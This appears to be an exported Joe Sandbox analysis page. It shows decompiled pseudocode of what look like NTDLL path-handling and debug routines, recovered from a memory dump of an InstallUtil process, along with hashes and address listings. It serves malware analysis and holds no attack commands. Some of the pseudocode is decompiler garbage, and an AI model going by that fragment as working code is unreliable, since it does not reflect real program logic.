0x012e007a
0x012e0080
0x012e0080
0x012e0087
0x012e008d
0x012e008f
0x012e0093
0x012e0095
0x012e009b
0x012e00f8
0x012e00fb
0x012e00fc
0x012e00ff
0x012e0108
0x012e0108
0x012e00a2
0x012e00a6
0x012e00b3
0x012e00bc
0x012e00c5
0x012e00ca
0x0132c01e
0x00000000
0x00000000
0x0132c02d
0x012e00d5
0x012e00d9
0x0132c03d
0x0132c046
0x0132c046
0x012e00df
0x012e00e2
0x012e00ea
0x012e00ef
0x012e00f2
0x012e00f6
0x012e0111
0x012e0117
0x012e0117
0x00000000
0x012e00f6
0x012e00d0
0x012e00d0
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 012E0111

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 6b66176f7ea9c287ca50f6be61f721b333299570755f0535f783089c190d9ced
Instruction ID: e923d23db8c2ab0a7c40bb1d73054382e461b7ff609b11c882dc720e8a6e1650
Opcode Fuzzy Hash: 6b66176f7ea9c287ca50f6be61f721b333299570755f0535f783089c190d9ced
Instruction Fuzzy Hash: 7B318F31311B05CFD726CF2CC844B5AB7E5FF89714F14456DE69687A90EBB5A802CB50

Uniqueness

Uniqueness Score: -1.00%

Function 012F2581 Relevance: 1.6, Strings: 1, Instructions: 329
COMMONCrypto

Download Yara Rule

C-Code - Quality: 82%

			E012F2581(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, signed int _a4, char _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, intOrPtr _a35) {
				signed int _v8;
				signed int _v16;
				unsigned int _v24;
				void* _v28;
				signed int _v32;
				unsigned int _v36;
				void* _v37;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t240;
				signed int _t244;
				signed int _t245;
				signed int _t254;
				signed int _t256;
				intOrPtr _t258;
				signed int _t261;
				signed int _t268;
				signed int _t271;
				signed int _t279;
				intOrPtr _t285;
				signed int _t287;
				signed int _t289;
				void* _t290;
				signed int _t291;
				signed int _t292;
				unsigned int _t295;
				signed int _t299;
				signed int* _t300;
				signed int _t301;
				signed int _t305;
				intOrPtr _t317;
				signed int _t326;
				signed int _t328;
				signed int _t329;
				signed int _t333;
				signed int _t334;
				signed int _t336;
				signed int _t338;
				signed int _t340;
				void* _t341;
				signed int _t343;
				void* _t344;

				_t338 = _t340;
				_t341 = _t340 - 0x4c;
				_v8 =  *0x13bd360 ^ _t338;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t333 = 0x13bb2e8;
				_v56 = _a4;
				_v48 = __edx;
				_v60 = __ecx;
				_t295 = 0;
				_v80 = 0;
				asm("movsd");
				_v64 = 0;
				_v76 = 0;
				_v72 = 0;
				asm("movsd");
				_v44 = 0;
				_v52 = 0;
				_v68 = 0;
				asm("movsd");
				_v32 = 0;
				_v36 = 0;
				asm("movsd");
				_v16 = 0;
				_t344 = (_v24 >> 0x0000001c & 0x00000003) - 1;
				_t285 = 0x48;
				_t315 = 0 | _t344 == 0x00000000;
				_t326 = 0;
				_v37 = _t344 == 0;
				if(_v48 <= 0) {
					L16:
					_t45 = _t285 - 0x48; // 0x0
					__eflags = _t45 - 0xfffe;
					if(_t45 > 0xfffe) {
						_t334 = 0xc0000106;
						goto L32;
					} else {
						_t333 = L012E4620(_t295,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t285);
						_v52 = _t333;
						__eflags = _t333;
						if(_t333 == 0) {
							_t334 = 0xc0000017;
							goto L32;
						} else {
							 *(_t333 + 0x44) =  *(_t333 + 0x44) & 0x00000000;
							_t50 = _t333 + 0x48; // 0x48
							_t328 = _t50;
							_t315 = _v32;
							 *((intOrPtr*)(_t333 + 0x3c)) = _t285;
							_t287 = 0;
							 *((short*)(_t333 + 0x30)) = _v48;
							__eflags = _t315;
							if(_t315 != 0) {
								 *(_t333 + 0x18) = _t328;
								__eflags = _t315 - 0x13b8478;
								 *_t333 = ((0 | _t315 == 0x013b8478) - 0x00000001 & 0xfffffffb) + 7;
								E0130F3E0(_t328,  *((intOrPtr*)(_t315 + 4)),  *_t315 & 0x0000ffff);
								_t315 = _v32;
								_t341 = _t341 + 0xc;
								_t287 = 1;
								__eflags = _a8;
								_t328 = _t328 + (( *_t315 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t279 = E013539F2(_t328);
									_t315 = _v32;
									_t328 = _t279;
								}
							}
							_t299 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t334 = _v68;
								__eflags = 0;
								 *((short*)(_t328 - 2)) = 0;
								goto L32;
							} else {
								_t289 = _t333 + _t287 * 4;
								_v56 = _t289;
								do {
									__eflags = _t315;
									if(_t315 != 0) {
										_t240 =  *(_v60 + _t299 * 4);
										__eflags = _t240;
										if(_t240 == 0) {
											goto L30;
										} else {
											__eflags = _t240 == 5;
											if(_t240 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t289 =  *(_v60 + _t299 * 4);
										 *(_t289 + 0x18) = _t328;
										_t244 =  *(_v60 + _t299 * 4);
										__eflags = _t244 - 8;
										if(_t244 > 8) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t244 * 4 +  &M012F2959))) {
												case 0:
													__ax =  *0x13b8488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E0130F3E0(__edi,  *0x13b848c, __ax & 0x0000ffff);
														__eax =  *0x13b8488 & 0x0000ffff;
														goto L26;
													}
													goto L108;
												case 1:
													L45:
													E0130F3E0(_t328, _v80, _v64);
													_t274 = _v64;
													goto L26;
												case 2:
													 *0x13b8480 & 0x0000ffff = E0130F3E0(__edi,  *0x13b8484,  *0x13b8480 & 0x0000ffff);
													__eax =  *0x13b8480 & 0x0000ffff;
													__eax = ( *0x13b8480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E0130F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L108;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E0130F3E0(_t328, _v76, _v36);
														_t274 = _v36;
													}
													L26:
													_t341 = _t341 + 0xc;
													_t328 = _t328 + (_t274 >> 1) * 2 + 2;
													__eflags = _t328;
													L27:
													_push(0x3b);
													_pop(_t276);
													 *((short*)(_t328 - 2)) = _t276;
													goto L28;
												case 6:
													__ebx = "\\WWw\\WWw";
													__eflags = __ebx - "\\WWw\\WWw";
													if(__ebx != "\\WWw\\WWw") {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E0130F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - "\\WWw\\WWw";
														} while (__ebx != "\\WWw\\WWw");
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x13b8478 & 0x0000ffff = E0130F3E0(__edi,  *0x13b847c,  *0x13b8478 & 0x0000ffff);
													__eax =  *0x13b8478 & 0x0000ffff;
													__eax = ( *0x13b8478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E013539F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x13b6e58 & 0x0000ffff = E0130F3E0(__edi,  *0x13b6e5c,  *0x13b6e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x13b6e58 & 0x0000ffff;
													__eax = ( *0x13b6e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t299 = _v16;
													_t315 = _v32;
													L29:
													_t289 = _t289 + 4;
													__eflags = _t289;
													_v56 = _t289;
													goto L30;
											}
										}
									}
									goto L108;
									L30:
									_t299 = _t299 + 1;
									_v16 = _t299;
									__eflags = _t299 - _v48;
								} while (_t299 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t244 =  *(_v60 + _t326 * 4);
						if(_t244 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t244 * 4 +  &M012F2935))) {
							case 0:
								__ax =  *0x13b8488;
								__eflags = __ax;
								if(__ax != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t315 =  &_v64;
								_v80 = E012F2E3E(0,  &_v64);
								_t285 = _t285 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x13b8480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x13b8480;
									goto L80;
								}
								goto L14;
							case 3:
								__eax = E012DEEF0(0x13b79a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L57();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E012DEB70(__ecx, 0x13b79a0);
									__eflags = __esi - 0xc0000100;
									if(__esi == 0xc0000100) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t218 = _v72;
											__eflags = _t218;
											if(_t218 != 0) {
												L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t218);
											}
											_t219 = _v52;
											__eflags = _t219;
											if(_t219 != 0) {
												__eflags = _t334;
												if(_t334 < 0) {
													L012E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t219);
													_t219 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t295 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x13b7b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L012E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E012DEB70(__ecx, 0x13b79a0);
										__eax = _v52;
										L36:
										_pop(_t327);
										_pop(_t335);
										__eflags = _v8 ^ _t338;
										_pop(_t286);
										return E0130B640(_t219, _t286, _v8 ^ _t338, _t315, _t327, _t335);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L57();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L108;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t281 = _v56;
								if(_v56 != 0) {
									_t315 =  &_v36;
									_t283 = E012F2E3E(_t281,  &_v36);
									_t295 = _v36;
									_v76 = _t283;
								}
								if(_t295 == 0) {
									goto L44;
								} else {
									_t285 = _t285 + 2 + _t295;
								}
								goto L14;
							case 6:
								__eax =  *0x13b5764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x13b8478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__dl != 0) {
									__eax = 0x13b8478;
									L80:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x13b6e58 & 0x0000ffff;
								__eax = ( *0x13b6e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t326 = _t326 + 1;
								if(_t326 >= _v48) {
									goto L16;
								} else {
									_t315 = _v37;
									goto L1;
								}
								goto L108;
						}
					}
					L56:
					_t300 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					asm("das");
					 *((intOrPtr*)(_t333 + 0x28)) =  *((intOrPtr*)(_t333 + 0x28)) + _t341;
					asm("das");
					_t245 = _t244 + _t341;
					asm("daa");
					asm("das");
					 *_t333 =  *_t333 + _t338;
					asm("das");
					 *((intOrPtr*)(_t333 + 0x28)) =  *((intOrPtr*)(_t333 + 0x28)) + _t245;
					asm("das");
					 *0x1f012f26 =  *0x1f012f26 + _t245;
					_pop(_t290);
					_t247 = _t341;
					_t343 = _t245 ^  *_t300;
					 *_t328 =  *_t328 - _t300;
					 *0x201335b =  *0x201335b + _t333;
					 *_t328 =  *_t328 - _t338;
					 *((intOrPtr*)(_t247 - 0x9fed0d8)) =  *((intOrPtr*)(_t341 - 0x9fed0d8)) + _t341;
					asm("daa");
					asm("das");
					 *_t333 =  *_t333 + _t290;
					 *_t328 =  *_t328 - _t300;
					 *((intOrPtr*)(_t333 + 0x28)) =  *((intOrPtr*)(_t333 + 0x28)) + _t300;
					asm("das");
					_a35 = _a35 + _t290;
					asm("das");
					_pop(_t291);
					asm("das");
					 *((intOrPtr*)(_t343 + _t291 * 2)) =  *((intOrPtr*)(_t343 + _t291 * 2)) + _t333;
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(0x20);
					_push(0x139ff00);
					E0131D08C(_t291, _t328, _t333);
					_v44 =  *[fs:0x18];
					_t329 = 0;
					 *_a24 = 0;
					_t292 = _a12;
					__eflags = _t292;
					if(_t292 == 0) {
						_t254 = 0xc0000100;
					} else {
						_v8 = 0;
						_t336 = 0xc0000100;
						_v52 = 0xc0000100;
						_t256 = 4;
						while(1) {
							_v40 = _t256;
							__eflags = _t256;
							if(_t256 == 0) {
								break;
							}
							_t305 = _t256 * 0xc;
							_v48 = _t305;
							__eflags = _t292 -  *((intOrPtr*)(_t305 + 0x12a1664));
							if(__eflags <= 0) {
								if(__eflags == 0) {
									_t271 = E0130E5C0(_a8,  *((intOrPtr*)(_t305 + 0x12a1668)), _t292);
									_t343 = _t343 + 0xc;
									__eflags = _t271;
									if(__eflags == 0) {
										_t336 = E013451BE(_t292,  *((intOrPtr*)(_v48 + 0x12a166c)), _a16, _t329, _t336, __eflags, _a20, _a24);
										_v52 = _t336;
										break;
									} else {
										_t256 = _v40;
										goto L62;
									}
									goto L70;
								} else {
									L62:
									_t256 = _t256 - 1;
									continue;
								}
							}
							break;
						}
						_v32 = _t336;
						__eflags = _t336;
						if(_t336 < 0) {
							__eflags = _t336 - 0xc0000100;
							if(_t336 == 0xc0000100) {
								_t301 = _a4;
								__eflags = _t301;
								if(_t301 != 0) {
									_v36 = _t301;
									__eflags =  *_t301 - _t329;
									if( *_t301 == _t329) {
										_t336 = 0xc0000100;
										goto L76;
									} else {
										_t317 =  *((intOrPtr*)(_v44 + 0x30));
										_t258 =  *((intOrPtr*)(_t317 + 0x10));
										__eflags =  *((intOrPtr*)(_t258 + 0x48)) - _t301;
										if( *((intOrPtr*)(_t258 + 0x48)) == _t301) {
											__eflags =  *(_t317 + 0x1c);
											if( *(_t317 + 0x1c) == 0) {
												L106:
												_t336 = E012F2AE4( &_v36, _a8, _t292, _a16, _a20, _a24);
												_v32 = _t336;
												__eflags = _t336 - 0xc0000100;
												if(_t336 != 0xc0000100) {
													goto L69;
												} else {
													_t329 = 1;
													_t301 = _v36;
													goto L75;
												}
											} else {
												_t261 = E012D6600( *(_t317 + 0x1c));
												__eflags = _t261;
												if(_t261 != 0) {
													goto L106;
												} else {
													_t301 = _a4;
													goto L75;
												}
											}
										} else {
											L75:
											_t336 = E012F2C50(_t301, _a8, _t292, _a16, _a20, _a24, _t329);
											L76:
											_v32 = _t336;
											goto L69;
										}
									}
									goto L108;
								} else {
									E012DEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
									_v8 = 1;
									_v36 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v44 + 0x30)) + 0x10)) + 0x48));
									_t336 = _a24;
									_t268 = E012F2AE4( &_v36, _a8, _t292, _a16, _a20, _t336);
									_v32 = _t268;
									__eflags = _t268 - 0xc0000100;
									if(_t268 == 0xc0000100) {
										_v32 = E012F2C50(_v36, _a8, _t292, _a16, _a20, _t336, 1);
									}
									_v8 = _t329;
									E012F2ACB();
								}
							}
						}
						L69:
						_v8 = 0xfffffffe;
						_t254 = _t336;
					}
					L70:
					return E0131D0D1(_t254);
				}
				L108:
			}

0x012f2584
0x012f2586
0x012f2590
0x012f2596
0x012f2597
0x012f2598
0x012f2599
0x012f259e
0x012f25a4
0x012f25a9
0x012f25ac
0x012f25ae
0x012f25b1
0x012f25b2
0x012f25b5
0x012f25b8
0x012f25bb
0x012f25bc
0x012f25bf
0x012f25c2
0x012f25c5
0x012f25c6
0x012f25cb
0x012f25ce
0x012f25d8
0x012f25db
0x012f25dd
0x012f25de
0x012f25e1
0x012f25e3
0x012f25e9
0x012f26da
0x012f26da
0x012f26dd
0x012f26e2
0x01335b56
0x00000000
0x012f26e8
0x012f26f9
0x012f26fb
0x012f26fe
0x012f2700
0x01335b60
0x00000000
0x012f2706
0x012f2706
0x012f270a
0x012f270a
0x012f270d
0x012f2713
0x012f2716
0x012f2718
0x012f271c
0x012f271e
0x01335b6c
0x01335b6f
0x01335b7f
0x01335b89
0x01335b8e
0x01335b93
0x01335b96
0x01335b9c
0x01335ba0
0x01335ba3
0x01335bab
0x01335bb0
0x01335bb3
0x01335bb3
0x01335ba3
0x012f2724
0x012f2726
0x012f2729
0x012f272c
0x012f279d
0x012f279d
0x012f27a0
0x012f27a2
0x00000000
0x012f272e
0x012f272e
0x012f2731
0x012f2734
0x012f2734
0x012f2736
0x01335bc1
0x01335bc1
0x01335bc4
0x00000000
0x01335bca
0x01335bca
0x01335bcd
0x00000000
0x01335bd3
0x00000000
0x01335bd3
0x01335bcd
0x012f273c
0x012f273c
0x012f2742
0x012f2747
0x012f274a
0x012f274d
0x012f2750
0x00000000
0x012f2756
0x012f2756
0x00000000
0x012f2902
0x012f2908
0x012f290b
0x00000000
0x012f2911
0x012f291c
0x012f2921
0x00000000
0x012f2921
0x00000000
0x00000000
0x012f2880
0x012f2887
0x012f288c
0x00000000
0x00000000
0x012f2805
0x012f280a
0x012f2814
0x012f2816
0x00000000
0x00000000
0x012f281e
0x012f2821
0x012f2823
0x00000000
0x012f2829
0x012f2829
0x012f2831
0x012f283c
0x012f283e
0x00000000
0x012f283e
0x00000000
0x00000000
0x012f284e
0x012f2850
0x012f2851
0x012f2854
0x012f2857
0x012f285a
0x012f285c
0x012f285d
0x00000000
0x00000000
0x012f275d
0x012f2761
0x00000000
0x012f2767
0x012f276e
0x012f2773
0x012f2773
0x012f2776
0x012f2778
0x012f277e
0x012f277e
0x012f2781
0x012f2781
0x012f2783
0x012f2784
0x00000000
0x00000000
0x01335bd8
0x01335bde
0x01335be4
0x01335be6
0x01335be8
0x01335be9
0x01335bee
0x01335bf8
0x01335bff
0x01335c01
0x01335c04
0x01335c07
0x01335c0b
0x01335c0d
0x01335c0d
0x01335c15
0x01335c18
0x01335c1b
0x01335c1b
0x01335c1e
0x00000000
0x00000000
0x012f28c3
0x012f28c8
0x012f28d2
0x012f28d4
0x012f28d8
0x012f28db
0x01335c26
0x01335c28
0x01335c2d
0x01335c2d
0x00000000
0x00000000
0x01335c34
0x01335c36
0x01335c49
0x01335c4e
0x01335c54
0x01335c5b
0x01335c5d
0x01335c60
0x012f2788
0x012f2788
0x012f278b
0x012f278e
0x012f278e
0x012f278e
0x012f2791
0x00000000
0x00000000
0x012f2756
0x012f2750
0x00000000
0x012f2794
0x012f2794
0x012f2795
0x012f2798
0x012f2798
0x00000000
0x012f2734
0x012f272c
0x012f2700
0x012f25ef
0x012f25ef
0x012f25ef
0x012f25f2
0x012f25f8
0x00000000
0x00000000
0x012f25fe
0x00000000
0x012f28e6
0x012f28ec
0x012f28ef
0x012f28f5
0x012f28f8
0x012f28f8
0x00000000
0x012f28f8
0x00000000
0x00000000
0x012f2866
0x012f2866
0x012f2876
0x012f2879
0x00000000
0x00000000
0x012f27e0
0x012f27e7
0x012f27e9
0x012f27eb
0x01335afd
0x00000000
0x01335afd
0x00000000
0x00000000
0x012f2633
0x012f2638
0x012f263b
0x012f263c
0x012f263e
0x012f2640
0x012f2642
0x012f2647
0x012f2649
0x012f264e
0x012f2650
0x012f2653
0x012f2659
0x012f26a2
0x012f26a7
0x012f26ac
0x012f26b2
0x01335b11
0x01335b15
0x01335b17
0x00000000
0x012f26b8
0x012f26b8
0x012f26ba
0x012f27a6
0x012f27a6
0x012f27a9
0x012f27ab
0x012f27b9
0x012f27b9
0x012f27be
0x012f27c1
0x012f27c3
0x012f27c5
0x012f27c7
0x01335c74
0x01335c79
0x01335c79
0x012f27c7
0x00000000
0x012f26c0
0x012f26c0
0x012f26c3
0x012f26c6
0x012f26c6
0x012f26c9
0x012f26c9
0x00000000
0x012f26c9
0x012f26ba
0x012f265b
0x012f265b
0x012f265e
0x012f2667
0x012f266d
0x012f2677
0x012f267c
0x012f267f
0x012f2681
0x01335b49
0x01335b4e
0x012f27cd
0x012f27d0
0x012f27d1
0x012f27d2
0x012f27d4
0x012f27dd
0x012f2687
0x012f2687
0x012f268a
0x012f268b
0x012f268e
0x012f268f
0x012f2691
0x012f2696
0x012f2698
0x012f269d
0x012f269f
0x00000000
0x012f269f
0x012f2681
0x00000000
0x00000000
0x012f2846
0x00000000
0x00000000
0x012f2605
0x012f260a
0x012f260c
0x012f2611
0x012f2616
0x012f2619
0x012f2619
0x012f261e
0x00000000
0x012f2624
0x012f2627
0x012f2627
0x00000000
0x00000000
0x01335b1f
0x00000000
0x00000000
0x012f2894
0x012f289b
0x012f289d
0x012f28a1
0x01335b2b
0x01335b2e
0x01335b2e
0x012f28a7
0x012f28a9
0x01335b04
0x01335b09
0x01335b09
0x01335b09
0x00000000
0x00000000
0x01335b35
0x01335b3c
0x012f28fb
0x012f28fb
0x012f26cc
0x012f26cc
0x012f26d0
0x00000000
0x012f26d2
0x012f26d2
0x00000000
0x012f26d2
0x00000000
0x00000000
0x012f25fe
0x012f292d
0x012f292f
0x012f2930
0x012f2935
0x012f2937
0x012f2938
0x012f293b
0x012f293c
0x012f293e
0x012f293f
0x012f2940
0x012f2942
0x012f2944
0x012f2947
0x012f2948
0x012f294e
0x012f2951
0x012f2951
0x012f2952
0x012f2954
0x012f295a
0x012f295c
0x012f2962
0x012f2963
0x012f2964
0x012f2966
0x012f2968
0x012f296b
0x012f296c
0x012f296f
0x012f2972
0x012f2977
0x012f2978
0x012f297d
0x012f297e
0x012f297f
0x012f2980
0x012f2981
0x012f2982
0x012f2983
0x012f2984
0x012f2985
0x012f2986
0x012f2987
0x012f2988
0x012f2989
0x012f298a
0x012f298b
0x012f298c
0x012f298d
0x012f298e
0x012f298f
0x012f2990
0x012f2992
0x012f2997
0x012f29a3
0x012f29a6
0x012f29ab
0x012f29ad
0x012f29b0
0x012f29b2
0x01335c80
0x012f29b8
0x012f29b8
0x012f29bb
0x012f29c0
0x012f29c5
0x012f29c6
0x012f29c6
0x012f29c9
0x012f29cb
0x00000000
0x00000000
0x012f29cd
0x012f29d0
0x012f29d9
0x012f29db
0x012f29dd
0x012f2a7f
0x012f2a84
0x012f2a87
0x012f2a89
0x01335ca1
0x01335ca3
0x00000000
0x012f2a8f
0x012f2a8f
0x00000000
0x012f2a8f
0x00000000
0x012f29e3
0x012f29e3
0x012f29e3
0x00000000
0x012f29e3
0x012f29dd
0x00000000
0x012f29db
0x012f29e6
0x012f29e9
0x012f29eb
0x012f29ed
0x012f29f3
0x012f29f5
0x012f29f8
0x012f29fa
0x012f2a97
0x012f2a9a
0x012f2a9d
0x012f2add
0x00000000
0x012f2a9f
0x012f2aa2
0x012f2aa5
0x012f2aa8
0x012f2aab
0x01335cab
0x01335caf
0x01335cc5
0x01335cda
0x01335cdc
0x01335cdf
0x01335ce5
0x00000000
0x01335ceb
0x01335ced
0x01335cee
0x00000000
0x01335cee
0x01335cb1
0x01335cb4
0x01335cb9
0x01335cbb
0x00000000
0x01335cbd
0x01335cbd
0x00000000
0x01335cbd
0x01335cbb
0x012f2ab1
0x012f2ab1
0x012f2ac4
0x012f2ac6
0x012f2ac6
0x00000000
0x012f2ac6
0x012f2aab
0x00000000
0x012f2a00
0x012f2a09
0x012f2a0e
0x012f2a21
0x012f2a24
0x012f2a35
0x012f2a3a
0x012f2a3d
0x012f2a42
0x012f2a59
0x012f2a59
0x012f2a5c
0x012f2a5f
0x012f2a5f
0x012f29fa
0x012f29f3
0x012f2a64
0x012f2a64
0x012f2a6b
0x012f2a6b
0x012f2a6d
0x012f2a72
0x012f2a72
0x00000000

Strings

PATH, xrefs: 012F2642, 012F2691

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.474395043.00000000013BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_12a0000_InstallUtil.jbxd

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: 8494966255c402124fd99c7a6650475fa05133fbb1780de0e7569a3141e2c3b5
Instruction ID: f4de659b8e6f6f4b396801b92a7b9c9ddad8146dd7b3ed4638e76acce77c2948
Opcode Fuzzy Hash: 8494966255c402124fd99c7a6650475fa05133fbb1780de0e7569a3141e2c3b5
Instruction Fuzzy Hash: D5C18E71D2020ADBDB29DF99D881AAEFBB4FF49714F14402DE601AB290E774E841CB60

Uniqueness

Uniqueness Score: -1.00%

Function 012CC962 Relevance: 1.6, APIs: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E012CC962(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t19;
				intOrPtr _t22;
				void* _t26;
				void* _t27;
				void* _t32;
				intOrPtr _t34;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x13bd360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E012DEEF0(0x13b70a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E0134F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E012DEB70(_t29, 0x13b70a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E0130B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E0134F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x13b70c0; // 0x0
					while(_t38 != 0x13b70c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x13bb1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}

0x012cc96a
0x012cc974
0x012cc988
0x012cc98a
0x01337c9d
0x01337c9f
0x01337ca4
0x01337cae
0x01337cf0
0x01337cf5
0x01337cfa
0x012cc992
0x012cc996
0x012cc997
0x012cc998
0x012cc9a3
0x012cc9a3
0x01337cb0
0x01337cb7
0x01337cbb
0x00000000
0x00000000
0x01337cbd
0x01337ce8
0x01337cc5
0x01337cc8
0x01337cca
0x01337cd0
0x01337cd6
0x01337cde
0x01337ce4
0x01337ce4
0x01337cd0
0x00000000
0x01337ce8
0x012cc990
0x00000000

Memory Dump Source

Source File: 0000000E.00000002.471073827.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: true

Associated: 0000000E.00000002.474368718.00000000013BB000.00000040.00000800.00020000.00000000.sdmpDownload File
